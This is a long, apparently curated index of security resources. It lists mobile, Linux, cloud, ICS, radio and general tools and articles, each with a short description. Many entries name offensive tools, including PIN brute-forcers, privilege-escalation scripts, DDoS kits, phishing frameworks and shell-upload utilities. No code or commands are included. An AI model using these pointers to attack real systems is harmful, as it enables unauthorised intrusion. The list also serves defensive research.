De Rebus Antiquis : This article aims to explain how to exploit the recursive stack overflow bug in the iOS 7 bootchain. , , -> , iOS
AirTag Scripts & Resources 150 5 months ago : AirTag instrumentation including AirTechno and firmware downgrades
Pegasus ID : After extensive research and understanding of how Pegasus Spyware is operating inside of iOS and AndroidOS systems I have created tools that will be able to identify & validate the presence of the spyware on your mobile devices, and tablets. Initial detection points were derived from the mvt-project
UTM : Securely run operating systems on your Mac
qemu-t8030 1,998 about 2 years ago : iPhone 11 emulated on QEMU
Dissecting TriangleDB, a Triangulation spyware implant
kfd 874 10 months ago : short for kernel file descriptor, is a project to read and write kernel memory on Apple devices. Attacks:

CSIRT / Mobile

Today I make public ALL recordings and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020!

CSIRT / Mobile / Android

android-security-awesome 8,213 3 months ago : A collection of android security related resources
tip toeing past android 7’s network security configuration
A Story About Three Bluetooth Vulnerabilities in Android
Creating an Android Open Source Research Device on Your PC
Droidefense 473 almost 2 years ago : Advance Android Malware Analysis Framework
android-device-check 83 about 5 years ago : Check Android device security settings
Project Zero : OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
I'm looking at a Huawei P20 from China, let see what can I found
Tracking down the developer of Android adware affecting millions of users
CLI tool to analyze APKs 41 8 months ago
Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices 166 over 4 years ago
Exploiting Android Messengers with WebRTC: Part 3
setools-android 249 about 7 years ago : Unofficial port of setools to Android with additional sepolicy-inject utility included
Security Guidelines : OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data
Proxying Android app traffic – Common issues / checklist
Magisk 48,721 12 days ago : is a suite of open source software for customizing Android, supporting devices higher than Android 5.0
Magisk Trust User Certs 1,770 about 1 year ago : A Magisk module that automatically adds user certificates to the system root CA store
MagiskFrida 949 8 days ago : Run frida-server on boot with Magisk, always up-to-date
Android-PIN-Bruteforce 4,055 about 1 year ago : Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb)
Mobile Threat Catalogue 143 about 1 year ago : NIST/NCCoE Mobile Threat Catalogue
CiLocks 2,313 8 months ago : Crack Interface lockscreen, Metasploit and More Android/IOS Hacking
mvt 10,416 21 days ago : MVT is a forensic tool to look for signs of infection in smartphone devices
Oscorp evolves into UBEL: an advanced Android malware spreading across the globe
Android Application Penetration Testing Checklist
50 secrets codes on Android
MobSecco 77 over 1 year ago : Cloning apk for bypassing code tampering detection, Google Safety Net and scanning vulnerable plugins

CSIRT / Mobile / Linux/ *Nix

BCC 20,577 8 days ago : Tools for BPF-based Linux IO analysis, networking, monitoring, and more
OpenSnitch is a GNU/Linux port of the Little Snitch application firewall 10,932 15 days ago
Security Onion 3,074 over 3 years ago :Linux distro for IDS, NSM, and Log Management
Linux Kernel Defence Map 1,774 5 months ago
wcc 1,849 about 1 month ago : The Witchcraft Compiler Collection
Ground Zero: Reverse Engineering :

CSIRT / Mobile / Linux/ *Nix / Ground Zero: Reverse Engineering

Password Protected Reverse Shells – Linux x64 Part 1-2:

CSIRT / Mobile / Linux/ *Nix / Ground Zero: Reverse Engineering / Active Directory Dojo:

Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
Active Directory Penetration Dojo- Setup of AD Penetration Lab : Part 2 - ScriptDotSh
Active Directory Penetration Dojo- Creation of Forest Trust: Part 3 - ScriptDotSh
Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh

CSIRT / Mobile / Linux/ *Nix

Dmesg under the hood : Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show to the user
Randomize your MAC address using NetworkManager
Shadow-Box 184 over 5 years ago : Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017) - and
Privilege Escalation : pentestbook
A cache invalidation bug in Linux memory management Project Zero:
Announcing flickerfree boot for Fedora 29
The Linux Backdoor Attempt of 2003
Análise de binários em Linux (PT-BR)
GMER : Rootkit Detector and Remover
suprotect 46 about 6 years ago : Changing memory protection in an arbitrary process
A look at home routers, and a surprising bug in Linux/MIPS
Hacking Tricks (pt-br) : Escalação de Privilégio em Linux com Capability
Basic Linux Privilege Escalation : It's just a basic & rough guide
Linux process infection (part I) :Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence
tpotce 6,855 8 days ago : T-Pot Universal Installer and ISO Creator
Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials : LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform
Linuxprivchecker.py 1,569 almost 3 years ago : A Linux Privilege Escalation Check Script
Linux Kernel exploitation Tutorial. 262 over 4 years ago
ebpf_exporter 2,200 20 days ago : Prometheus exporter for custom eBPF metrics
Zydra 421 12 months ago : is a file password recovery tool and Linux shadow file cracker. It uses the dictionary search or Brute force method for cracking passwords
A gentle introduction to Linux Kernel fuzzing -
Teardown of a Failed Linux LTS Spectre Fix : Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels
Ropstar 317 over 1 year ago : Automatic exploit generation for simple linux pwn challenges
Ken Thompson's Unix password
Exploiting Wi-Fi Stack on Tesla Model S
dlinject.py 775 over 2 years ago : Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
(Ab)using Kerberos from Linux
LKRG 415 about 1 month ago : Linux Kernel Runtime Guard
Privilege Escalation via Python Library Hijacking
Logging Passwords on Linux
Kicksecure ™ : A Security-hardened, Non-anonymous Linux Distribution
Setuid Demystified
ProcDump-for-Linux 2,951 6 days ago : A Linux version of the ProcDump Sysinternals tool
OPNsense GUI, API and systems backend 3,363 4 days ago
static-binaries 3,183 over 1 year ago : Various *nix tools built as statically-linked binaries
Traitor 6,689 8 months ago : Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins ⬆️ ☠️
traitor 6,689 8 months ago
ProcMon-for-Linux 4,030 7 days ago : is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system
OSWatcher 58 about 1 year ago : A framework to track the evolution of Operating Systems over time
Producing a trustworthy x86-based Linux appliance
Running a quick NMAP scan to inventory my network
Packet Strider 253 almost 4 years ago : A network packet forensics tool for SSH
telfhash 102 almost 3 years ago (Trend Micro ELF Hash): Symbol hash for ELF files
64-bit Linux stack smashing tutorial: Part 1
Hardening ELF binaries using Relocation Read-Only (RELRO)
Linux Threat Report 2021 1H
Learning Linux Kernel Exploitation - Part 1
Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
So You Wanna Pwn The Kernel?
SMB “Access is denied” caused by anti-NTLM relay protection

CSIRT / Mobile / Cloud

Scout Suite 6,730 about 2 months ago : Multi-Cloud Security Auditing Tool
Cloud Security Research 355 over 4 years ago : Cloud-related research releases from the Rhino Security Labs team
gVisor 15,851 6 days ago : is an application kernel, written in Go, that implements a substantial portion of the Linux system surface
PARSEC 471 3 months ago : Platform AbstRaction for SECurity service
Cloud Security Alliance : The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment
CIS Controls Cloud Companion Guide
CloudFail 2,237 8 months ago : Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network
HatCloud 514 over 1 year ago (discontinued)
Uncovering bad guys hiding behind CloudFlare
CloudFlair 2,618 5 months ago : Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys
thsosrtl 52 over 10 years ago : Repo for tools - cloud and vpn. : was originally thought of for attempting to resolve the true IP address of targets running through cloudflare
Malicious Shell Script Steals Cloud Credentials
badPods 599 over 2 years ago : A collection of manifests that will create pods with elevated privileges
carbon-black-cloud-sdk-python 40 7 days ago VMware Carbon Black Cloud Python SDK
Baserunner 205 about 2 years ago : A tool for exploring Firebase datastores
A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next
Cloud Native Computing Foundation The (CNCF) hosts critical components of the global technology infrastructure
Checkov 7,126 7 days ago is a static code analysis tool for infrastructure-as-code
KICS 2,093 8 days ago stands for Keeping Infrastructure as Code Secure, it is open source and is a must-have for any cloud native project. finds security vulnerabilities, compliance issues, and infrastructure misconfigurations in following Infrastructure as Code solutions: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible. 1900+ queries are available
10 real-world stories of how we’ve compromised CI/CD pipelines
GitHub Action Runners , Analyzing the Environment and Security in Action

CSIRT / Mobile / GCP/Google

gcp dhcp takeover code exec 533 over 3 years ago : Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent
New research: How effective is basic account hygiene at preventing hijacking

CSIRT / Mobile / Azure

SimuLand 703 over 1 year ago : Understand adversary tradecraft and improve detection strategies
Azure-Readiness-Checklist 495 almost 2 years ago : This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important!
Preventing Exposed Azure Blob Storage
Open Azure blobs search on grayhatwarfare.com and other updates
ChaosDB : is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database - Cosmos DB
Introducing Project Freta : Toward trusted sensing for the cloud
Finding Azurescape : Cross-Account Container Takeover in Azure Container Instances
Malicious KQL Query Azure Monitor:

CSIRT / Mobile / AWS

git-secrets 12,442 7 months ago : Prevents you from committing secrets and credentials into git repositories
CloudMapper 6,003 4 months ago : CloudMapper helps you analyze your Amazon Web Services (AWS) environments
Security Monkey 4,357 almost 4 years ago : Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time
my-arsenal-of-aws-security-tools 8,975 25 days ago : List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc
RKMS 43 almost 6 years ago : RKMS is a highly available key management service, built on top of AWS's KMS
FireProx 1,925 over 1 year ago : AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation
AWS IAM privileges as found using the AWS Policy Generator described at
Sadcloud 658 about 1 year ago : A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure
Endgame : Creating
Bucky 190 almost 3 years ago : An automatic S3 bucket discovery tool
Prowler 10,839 7 days ago : Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness
barq 386 about 2 years ago : The AWS Cloud Post Exploitation framework!
Text → AWS IAM Policy : Describe your ideal AWS IAM Policy in plain text and will use GPT-3 from Open AI to generate an AWS IAM policy

CSIRT / Risk Assessment and Vulnerability Management

Gerenciamento de Risco Cibernético (PT-BR)
RITA (Real Intelligence Threat Analytics) 2,509 4 months ago
Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash by grugq
ISO27001 audit in real-time....
Gearing Towards Your Next Audit : Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards
Nuclei 20,687 7 days ago is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use. : Community curated list of templates for the nuclei engine to find a security vulnerability in application

CSIRT / Risk Assessment and Vulnerability Management / Nuclei

Nuclei unleashed - writing first exploit

CSIRT / Risk Assessment and Vulnerability Management

Secure design principles
Risk Assessment of GitHub Copilot
ISA/IEC 62443
Understanding IEC 62443
NERC CIP
Threat Modeling Manifesto
hcltm 401 3 months ago : Documenting your Threat Models with HCL
Risk Management Framework for Systems and Organizations Introductory Course

CSIRT / Risk Assessment and Vulnerability Management / Guidelines

NIST Special Publication 800-63B: Digital Identity Guidelines
Easy Ways to Build a Better P@$5w0rd
Time for Password Expiration to Die
Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events

CSIRT / ICS (SCADA)

GRASSMARLIN 941 over 4 years ago : Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments
ATT&CK® for Industrial Control Systems
THE RACE TO NATIVE CODE EXECUTION IN PLCS
The Top 20 Secure PLC Coding Practices Project

CSIRT / ICS (SCADA) / Synchrophasor

IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems
Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements
IEEE C37.118 protocol
IEEE C37.118 Synchrophasor Protocol wireshark wiki

CSIRT / ICS (SCADA)

INFRA:HALT : Forescout Research Labs and JFrog Security Research discover 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack, allowing for Denial of Service or Remote Code Execution primarily affecting operational technology (OT) and industrial control system (ICS) devices
Findings From Examining More Than a Decade of Public ICS/OT Exploits
The Top 20 Secure PLC Coding Practices Project
Conpot 1,243 9 months ago : ICS/SCADA honeypot
Hello_Proto 9 over 3 years ago : "Banner Grabbing" en entornos industriales

CSIRT / Radio

Qualcomm chain-of-trust
Presenting QCSuper : a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones
Logitech keyboards and mice vulnerable to extensive cyber attacks
A look at GSM
The gr-gsm project 1,346 11 months ago : Gnuradio blocks and tools for receiving GSM transmissions
srsLTE 3,484 5 months ago : Open source SDR LTE software suite from Software Radio Systems (SRS)
List of software-defined radios
Spectrum Analyzers, Linux

CSIRT / Radio / Spectrum Analyzers, Linux

Sonic Visualiser :
spek
SpectMorph : is a free software project which allows to analyze samples of musical instruments, and to combine them (morphing)

CSIRT / Radio

The LibreCellular project aims to make it easier to create 4G cellular networks with open source software and low cost software-defined radio (SDR) hardware
RFSec-ToolKit 1,565 6 months ago is a collection of Radio Frequency Communication Protocol Hacktools

CSIRT / Radio / Satellite

How Do I Crack Satellite and Cable Pay TV? (33c3)

CSIRT / Radio / Satellite / How Do I Crack Satellite and Cable Pay TV? (33c3)

Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream. 19 over 8 years ago
Process QPSK-demodulated data into transport stream (SCTE 55-1) 21 over 8 years ago

CSIRT / Social Engineering

Cartero 171 over 4 years ago : Social Engineering Framework
The Basics of Social Engineering by Chris Pritchard on DEF CON 27. Books suggested:

CSIRT / Social Engineering / The Basics of Social Engineering

Never Split Difference Chris Voss
The Carisma Myth Olivia Fox Cabane
Hacking the Human Ian Mann
Chris Hadnagy The Art Of Social Engineering -
Joe Navarro What Everybody is Saying -

CSIRT / Social Engineering

The Social-Engineer Toolkit (SET) 11,000 about 1 month ago : repository from TrustedSec - All new versions of SET will be deployed here

CSIRT / Tools

Network Security Monitoring on Raspberry Pi type devices 779 almost 7 years ago
A secure, shared workspace for secrets 614 almost 6 years ago
bettercap 16,771 6 days ago , the Swiss army knife for network attacks and monitoring
Quijote 47 almost 4 years ago is an highly configurable HTTP middleware for API security
Tool Analysis Result Sheet 345 almost 7 years ago and , via by jpcertcc
EKOLABS 51 about 2 years ago tools repo
Vapor PwnedPasswords Provider : Package for testing a password against Pwned Passwords V2 API in Vapor
Is my password pwned? 151 almost 4 years ago ,
XPoCe XPC Snooping utilties for MacOS and iOS (version 2.0)
Enterprise Password Quality Checking 158 almost 2 years ago using any hash data sources (HaveIBeenPwned lists, et al)
DockerAttack 278 over 6 years ago : Various Tools and Docker Images
PyREBox 1,654 9 months ago is a Python scriptable Reverse Engineering sandbox
find3 4,653 almost 2 years ago : High-precision indoor positioning framework, version 3
structured-text-tools 6,982 3 months ago : A list of command line tools for manipulating structured text data
telnetlogger 238 over 7 years ago : Simulates enough of a Telnet connection in order to log failed login attempts
vault 31,217 6 days ago : A tool for secrets management, encryption as a service, and privileged access management
WeakNet LINUX 8 : This is an information-security themed distribution that has been in development since 2010
HiTB : It was a part of HackTheBox platform
arphid 34 over 6 years ago : DYI 125KHz RFID read/write/emulate guide
Pybelt 511 over 6 years ago : The hackers tool belt
mhax 30 over 6 years ago
U2F Support Firefox Extension 197 about 7 years ago
git-bug 8,148 11 days ago : Distributed bug tracker embedded in Git
mkcert 50,197 3 months ago : A simple zero-config tool to make locally trusted development certificates with any names you'd like
trackerjacker 2,636 10 months ago : Like nmap for mapping wifi networks you're not connected to, plus device tracking
Polymorph 461 10 months ago is a real-time network packet manipulation framework with support for almost all existing protocols
query_huawei_wifi_router 13 over 3 years ago : A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
kravatte 15 almost 6 years ago : Implementation of Kravatte Encryption Suite
noisy 1,692 12 months ago : Simple random DNS, HTTP/S internet traffic noise generator
PatternAnalyzer 12 over 4 years ago : The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use
Google Chromium 20,774 7 days ago , sans integration with Google
Gammux 54 over 5 years ago : A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images
openvotenetwork : Implementation of anonymous in go
put2win 125 over 4 years ago : Script to automatize shell upload by PUT HTTP method to get meterpreter
Tools by Morphus Labs
Stratosphere IPS
Convert nmap Scans into Beautiful HTML Pages
NMapGUI 468 over 4 years ago : Advanced Graphical User Interface for NMap
GeoInt
python-nubia 1,591 over 2 years ago : A command-line and interactive shell framework
nipe 1,954 3 months ago : is a script to make Tor Network your default gateway
fuxploider 3,050 over 1 year ago : File upload vulnerability scanner and exploitation tool
solo 2,310 about 2 years ago : FIDO2 USB+NFC token optimized for security, extensibility, and style
Joint Report On Publicly Available Hacking Tools : by Canadian Centre for Cyber Security
APTSimulator 2,470 over 1 year ago : A toolset to make a system look as if it was the victim of an APT attack
debugger-netwalker 7 about 7 years ago : NetWalker Debugger
USB armory 1,372 24 days ago :
Bashfuscator 1,660 about 1 year ago : A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team
Big List of Naughty Strings 46,201 7 months ago
Netflix Cloud Security SIRT releases Diffy : A Differencing Engine for Digital Forensics in the Cloud -
Command-Line Snippets : A place to share useful, one-line commands that make your life easier
IP-to-ASN - Team Cymru
4nonimizer 620 almost 3 years ago : A bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN)
free Entropy Service
Correct Horse Battery Staple : Secure password generator to help keep you safer online
CorrectHorse 2 about 8 years ago : random secure password generator
XKCD-password-generator 1,325 5 months ago : Generate secure multiword passwords/passphrases, inspired by XKCD
Using a Hardened Container Image for Secure Applications in the Cloud
freedomfighting 403 over 1 year ago : A collection of scripts which may come in handy during your freedom fighting activities
Machine Learning and Security 1,979 about 2 years ago : Source code about machine learning and security
octofairy 14 almost 6 years ago : A machine learning based GitHub bot for Issues
kbd-audio 8,545 almost 2 years ago : Tools for capturing and analysing keyboard input paired with microphone capture
certstreamcatcher 81 almost 6 years ago : This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks
Wifiphisher 13,314 11 months ago : is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing
chezmoi 13,411 4 days ago : Manage your dotfiles securely across multiple machines
hexyl 9,166 23 days ago : A command-line hex viewer
Giggity 126 over 1 year ago : Wraps github api for openly available information about an organization, user, or repo
howmanypeoplearearound 6,919 3 months ago : Count the number of people around you by monitoring wifi signals
LASCAR 376 about 1 year ago : Ledger's Advanced Side-Channel Analysis Repository
Hostintel : A Modular Python Application To Collect Intelligence For Malicious Hosts -
DarkNet_ChineseTrading 1,067 over 1 year ago
mXtract 582 about 3 years ago : Memory Extractor & Analyzer
commando-vm 6,960 about 2 months ago : a fully customized, Windows-based security distribution for penetration testing and red teaming

CSIRT / Tools / commando-vm

commando packages 6,960 about 2 months ago

CSIRT / Tools

Introducing Inkdrop 4
AntiCheat-Testing-Framework 791 over 2 years ago : Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal)
how we uncovered an attack on government entities in Europe IronPython, darkly:
inlets : Expose your local endpoints to the Internet
papers 5 2 months ago Papers released by the Intelstorm Team
Pwnagotchi 7,750 3 months ago : (⌐■_■) - Deep Reinforcement Learning vs WiFI
spyse.py 269 over 4 years ago : Python API wrapper and command-line client for the tools hosted on spyse.com
Cloning a MAC address to bypass a captive portal
Open Steno Project was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry
Machine Learning on Encrypted Data Without Decrypting It
0bin 1,378 over 3 years ago : Client side encrypted pastebin
Raspberry pi as poor man’s hardware hacking tool
usbkill 4,442 9 months ago : is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer
gs-transfer 24 over 3 years ago : Secure File Transfer via Global Socket Bounce Network
CORE 683 about 2 months ago : The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines
VoightKampff : Beating Google ReCaptcha and the funCaptcha using AWS Rekognition
John the Ripper in the cloud : John the Ripper jumbo supports hundreds of hash and cipher types
SpamCop is the premier service for reporting spam
vector-edk 132 over 9 years ago : EFI Development Kit
H1R0GH057 1,838 over 1 year ago : tools (DDoS, lulz, etc..)
gatekeeper 1,341 about 2 months ago : First open-source DDoS protection system
uriDeep 95 almost 3 years ago : Unicode encoding attacks with machine learning
Rawsec's CyberSecurity Inventory :
gaijin tools
Lord Of The Strings (LOTS) 9 over 4 years ago : String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives)
Unit 42 Public Tools Repo 709 about 2 years ago : Listing of tools released by Palo Alto Networks Threat Intelligence team
glsnip 109 almost 3 years ago : copy and paste across machines
CERTrating is the first tool to assess the Maturity Level of CERTs and their services. News:
Cybersecurity Maturity Model Certification (CMMC)
What is the Cybersecurity Maturity Model Certification (CMMC)
Who needs to have Cybersecurity Maturity Model Certification (CMMC)
Security Tools : Most of the links listed here goes to the original sites
Find Virtual Hosts for Any IP Address
ngrok 24,183 7 months ago : Introspected tunnels to localhost
cppngrok 8 over 3 years ago : a cpp wrapper for ngrok (WIP)
Pybull 31 over 2 years ago : Contains some cool python projects. It is 100% python coded. Have fun see_no_evil
dfss 5 about 8 years ago : Daemon for sense of security. Shutdown or reboot your computer, like a " "
Gamifying machine learning for stronger security and AI models : : An experimentation and research platform to investigate the interaction of automated agents in an abstract simulated network environments
BashScan : is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap
python-libnessus 25 almost 2 years ago : Python Nessus Library - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful
NFIQ2 132 about 2 months ago : Biometric fingerprint image quality assessment tool
Beta 245 about 1 year ago : Beta versions of Didier Stevens's software
MaxMind ASN Importer 3 over 1 year ago : This is a script to import MaxMind ASN data into Tags (Host Groups) within Stealthwatch Enterprise, allowing for more granular tuning and identification of network flows
SubSeven is Back : The legendary SubSeven returns with a fan-made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required
Detect It Easy 7,631 5 days ago : Program for determining types of files for Windows, Linux and MacOS
Ronin is a free and Open Source Ruby toolkit for security research and development. Ronin contains many different CLI commands and Ruby libraries for a variety of security tasks, such as encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, scanning for web vulnerabilities, spidering websites, install 3rd party repositories of exploits and/or payloads, run exploits, write new exploits, managing local databases, fuzzing data, and much more

CSIRT / Tools / Note-taking

Awesome note-taking apps for hackers ! 347 almost 4 years ago
SwiftnessX 889 almost 2 years ago : A cross-platform note-taking & target-tracking app for penetration testers
cherrytree : A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file
cherrytree : A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file
SwiftnessX 889 almost 2 years ago : A cross-platform note-taking & target-tracking app for penetration testers
https://github.com/zadam/trilium 27,370 4 months ago [trilium] ): Build your personal knowledge base with Trilium Notes
obsidian : is a powerful knowledge base that works on top of a local folder of plain text Markdown files
CudaText ,
marktext 47,398 3 months ago : A simple and elegant markdown editor, available for Linux, macOS and Windows
helix 33,775 9 days ago : A post-modern modal text editor
Compare AsciiDoc and Markdown

CSIRT / Tools / Kali

hurl 72 about 7 years ago : hexadecimal & URL encoder + decoder. : hURL is a small utility that can encode and decode between multiple formats
Kali Tools

CSIRT / Tools / IP Reputation

IP Reputation Check
IP & Domain Reputation Center

CSIRT / Tools / Shell tools

Python-Scripts 172 9 days ago : some scripts for penetration testing
SubEnum 329 about 1 year ago : bash script for Subdomain Enumeration
password-store : Simple password manager using gpg and ordinary unix directories

CSIRT / Tools / Search Engines

DarkSearch :
Search engines for Hackers :

CSIRT / Tools / Search Engines / Search engines for Hackers

censys.io
shodan.io

CSIRT / Tools / Search Engines / Search engines for Hackers / shodan.io

TriOp : Tool for quickly gathering statistical information from Shodan.io

CSIRT / Tools / Search Engines / Search engines for Hackers

viz.greynoise.io
zoomeye.org
wigle.net
publicwww.com
hunter.io
haveibeenpwned.com
haveibeenEMOTET
thispersondoesnotexist.com
osintframework.com
NAPALM FTP Indexer lets you search and download files located on public FTP servers. The most advanced FTP Search Engine service maintained by members

CSIRT / Tools / Search Engines

Insecam : Network live IP video cameras directory

CSIRT / Tools / VPN

jigsaw project by Alphabet/Google. : VPN Server
SSHuttle 11,787 22 days ago : Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling
WireGuard : is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache
Crockford’s base 32 encoding : Crockford’s base 32 encoding is a compromise between efficiency and human legibility
Sputnik -An Open Source Intelligence Browser Extension
PCredz 2,013 about 1 month ago : This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface
uncaptcha2 4,959 almost 6 years ago : defeating the latest version of ReCaptcha with 91% accuracy
Nefarious LinkedIn 824 almost 6 years ago : A look at how LinkedIn spies on its users
ProtonVPN-CLI : Linux command-line client for ProtonVPN. Written in Python
Nebula 14,583 7 days ago : A scalable overlay networking tool with a focus on performance, simplicity and security
AirVPN A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship
Build your own private WireGuard VPN with PiVPN

CSIRT / Tools / Secure Sharing

CryFS : Keep your data safe in the cloud
Cryptomator : Multi-platform transparent client-side encryption of your files in the cloud
VeraCrypt : is a free open source disk encryption software for Windows, Mac OSX and Linux
CipherShed : is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs)
Boxcryptor : Security for your Cloud
Nextcloud E2E 31 15 days ago : End-to-end encryption RFC. Some old news
DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition
ProjectSend 1,411 about 2 months ago is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
send 13,263 over 3 years ago Mozilla : Simple, private file sharing from the makers of Firefox (archived). Revival:

CSIRT / Privacy

Device and Data Access when Personal Safety is At Risk Apple:
Everything Old is New Part 2: Why Online Anonymity Matters
Data Security on Mobile Devices : Current State of the Art, Open Problems, and Proposed Solutions
Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response.
TorBox Wireless Manager
Anyone can use this powerful facial-recognition tool — and that's a problem
The Instagram ads Facebook won't show you
Yggdrasil 3,649 4 days ago : An experiment in scalable routing as an encrypted IPv6 overlay network
Receiving sensitive information about any Dodo pizzeria 24 over 3 years ago
4TB of stolen identities are being circulated online following a breach on Oriflame
Using “Master Faces” to Bypass Face-Recognition Authenticating Systems , , two
apollo 1,372 about 1 year ago : A Unix-style personal search engine and web crawler for your digital footprint
Forensic Methodology Report: How to catch NSO Group’s Pegasus
Who is being monitored? : Politicians regularly claim that they need to ban encryption to protect the children. But who is actually being monitored?
How to choose a browser for everyday use? , and
TrackerControl 31 over 1 year ago : monitor and control trackers and ads
Disinformation guru “Hacker X” names his employer: NaturalNews.com
Hey Siri, Find My Ex : Tech-Enabled Abuse in the Apple Ecosystem
Keyhole Imaging
Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared
Global Presence of Authoritarian Tech
Zooming in on Zero-click Exploits

CSIRT / General

Explain Shell
Examples of regular expressions
A tcpdump Tutorial and Primer with Examples
Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
A curated list of awesome Threat Intelligence resources 8,127 3 months ago
Looking for value in EV Certificates
How to find hidden cameras
the Simple Encrypted Arithmetic Library (SEAL) 225 over 5 years ago : This repository is a fork of Microsoft Research's homomorphic encryption implementation
Cupcake 408 about 1 year ago : A Rust library for lattice-based additive homomorphic encryption
Our latest updates on Fully Homomorphic Encryption
A port of ChibiOS to the Orchard radio platform 11 about 9 years ago
Decent Security : Everyone can be secure
Introducing Certificate Transparency and Nimbus
trillian 3,553 6 days ago : Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees
CFSSL's CA trust store repository 258 18 days ago
A Few Thoughts on Cryptographic Engineering
Mailfence
Threat Hunting Workshop - Methodologies for Threat Analysis
Xoodoo 32 almost 3 years ago
CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings
AgentMaps 918 2 months ago : Make social simulations on interactive maps with Javascript!
flowsscripts 1 over 6 years ago : Miner pools ips
